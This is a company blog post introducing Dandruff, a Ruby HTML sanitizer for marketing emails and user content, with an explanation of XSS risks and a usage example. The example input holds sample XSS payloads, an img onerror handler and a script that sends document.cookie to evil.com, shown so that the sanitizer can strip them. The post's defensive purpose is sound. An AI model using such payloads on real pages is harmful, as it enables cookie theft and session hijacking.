At KUY.io, we build tools that empower users and business to communicate effectively. In our own productivity tools and our custom marketing automation tools we often find ourselves handling user-generated content. A common requirement we encounter is allowing our communications team to design and send outreach and newsletter emails using HTML markup. For you it may be other kinds of user-created content like comments on blog posts.

Giving users the power to express themselves in HTML is a double-edged sword. On one side, it offers creative freedom; on the other, it opens the door to a host of security vulnerabilities. To tackle this, we built Dandruff, a robust HTML sanitizer designed to keep your applications clean and secure.

The Importance of Sanitizing External HTML

When you allow users to input text that ends up being rendered in a browser - or worse, in a customer's email client - you are effectively entrusting your reputation to that input. HTML is expressive, but it wasn't designed with "untrusted input" as a default safety setting.

Sanitization is the process of taking that untrusted markup, parsing it, and stripping out anything that could be harmful while preserving the formatting that the user intended. It sounds simple, but the line between "rich text" and "malicious payload" is often thinner than you think.

Bad Things Could Happen

If you render raw HTML from a user without sanitizing it, you are vulnerable to Cross-Site Scripting (XSS). This is the big one. An attacker could inject a <script> tag or an onload event handler into an image. When your other users (or your own admins) view this content, that script executes in their browser with your domain's privileges.

The consequences range from:

  • Session Hijacking: Stealing cookies and taking over admin accounts.
  • Phishing: Injecting fake login forms to steal credentials.
  • Defacement: altering the look of your application to spread misinformation.

For email specifically, broken HTML can also destroy the layout of your marketing campaigns, making your brand look unprofessional. A missing closing </div> or a rogue <style> tag can wreak havoc on an inbox.

Existing Solutions

The Ruby ecosystem has some great tools for this. Loofah and Sanitize are the heavy hitters. They are battle-tested and we have used them for years.

However, we found that existing solutions often force you into a binary choice:

  1. Too Strict: They strip out everything, including the <table> structures and inline style attributes that are absolutely critical for rendering HTML emails correctly across Outlook, Gmail, and Apple Mail.

  2. Too Permissive: Enabling "relaxed" modes often opens up vectors we didn't intend to allow, requiring verbose configuration files to lock things back down.

We needed something that was secure by default but understood the nuances of formatted content like marketing emails.

Why We Built Dandruff

We ended up creating Dandruff because we wanted a sanitizer that treats "cleaning up" as a first-class citizen. Built on top of a battle-proven library with a strong security model.

Dandruff is designed to:

  • Preserve Email Layouts: It understands that <table>, <tr>, and <td> are not just data structures but layout tools in the email world.
  • Smart Style Allow-listing: Instead of stripping all CSS, Dandruff allows you to safely permit specific CSS properties (like color, font-size, text-align) while blocking dangerous ones (like position: fixed or behavior).
  • Performance: It uses a highly efficient parsing strategy to handle large marketing templates without bogging down your background job queues.

We named it Dandruff because it gets rid of the flaky, unwanted bits in your code, leaving you with a clean, healthy head of... well HTML.

Using Dandruff

Let's look at a real-world example. You have a newsletter email feature where your marketing teams can submit a template. You want to allow them to style their text and use tables, but you absolutely want to block any JavaScript.

Here is how you would use Dandruff to sanitize that payload.

require 'dandruff'

# A potentially malicious payload provided by a user
user_input = <<~HTML
  <div style="background-color: #f0f0f0; padding: 20px;">
    <h1 style="color: #333;">Welcome to Our Newsletter!</h1>
    <p>Check out our latest deals.</p>

    <img src="x" onerror="alert('Stealing your cookies!')" />

    <table border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td><a href="https://example.com">Click Here</a></td>
      </tr>
    </table>

    <script>fetch('https://evil.com/steal?data=' + document.cookie)</script>
  </div>
HTML

# Sanitize it with Dandruff using the email profile
safe_html = Dandruff.clean(user_input, profiles: [:html_email])

puts safe_html

Output:

<div style="background-color: #f0f0f0; padding: 20px;">
  <h1 style="color: #333;">Welcome to Our Newsletter!</h1>
  <p>Check out our latest deals.</p>

  <img src="x">

  <table border="0" cellpadding="0" cellspacing="0">
    <tr>
      <td><a href="https://example.com">Click Here</a></td>
    </tr>
  </table>

  </div>

Dandruff surgically removed the onerror attribute and the <script> tag, but preserves the inline styles and table structure necessary for the email to render correctly.

The test suite for Dandruff contains hundreds of examples of common attack vectors from simple JavaScript on* attacks to sophisticated mutation-based XSS attacks that only trigger when a sanitizer removes supposedly unclean pieces and inadvertently assembles the malicious code through the cleaning operation.

Check out the project on GitHub at github.com/kuyio/dandruff and let us know how you keep your HTML clean!